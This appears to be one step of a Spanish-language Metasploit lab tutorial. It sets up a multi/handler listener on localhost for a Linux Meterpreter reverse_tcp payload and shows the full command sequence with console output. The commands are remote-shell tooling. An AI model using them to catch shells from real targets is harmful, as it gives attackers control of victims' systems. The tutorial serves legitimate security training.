Configuración de un Listener de Meterpreter
En este paso final, aprenderás a configurar un listener para un payload de Meterpreter. Meterpreter es un payload avanzado y rico en funciones que proporciona una shell interactiva en el sistema objetivo. En lugar de lanzar un exploit, utilizarás el módulo exploit/multi/handler para escuchar conexiones entrantes. Esto es útil cuando un exploit se entrega por otros medios (por ejemplo, un archivo malicioso) y necesitas capturar la conexión inversa.
Primero, cambia al módulo multi/handler.
use exploit/multi/handler
Tu prompt cambiará para reflejar el nuevo módulo.
msf6 exploit(multi/handler) >
A continuación, define un payload de Meterpreter. Utilizaremos uno diseñado para sistemas Linux.
set payload linux/x86/meterpreter/reverse_tcp
Ahora, configura las opciones del listener, LHOST y LPORT, tal como hiciste anteriormente.
set LHOST 127.0.0.1
Nota: Es posible que veas un mensaje de advertencia sobre la vinculación a una dirección de loopback. Esto es normal cuando se usa localhost (127.0.0.1) y puede ignorarse con seguridad en este laboratorio.
set LPORT 4444
Finalmente, inicia el listener usando el comando exploit.
exploit
Metasploit iniciará un listener en la IP y el puerto especificados, esperando a que se conecte una sesión de Meterpreter.
[*] Started reverse TCP handler on 127.0.0.1:4444
La consola permanecerá activa, esperando una conexión. En un escenario real, si una máquina objetivo ejecutara el payload de Meterpreter correspondiente, se establecería una sesión aquí. Dado que ningún objetivo se conectará en este laboratorio, puedes detener el listener presionando Ctrl + C.
Para salir de la consola de Metasploit, escribe exit y presiona Enter.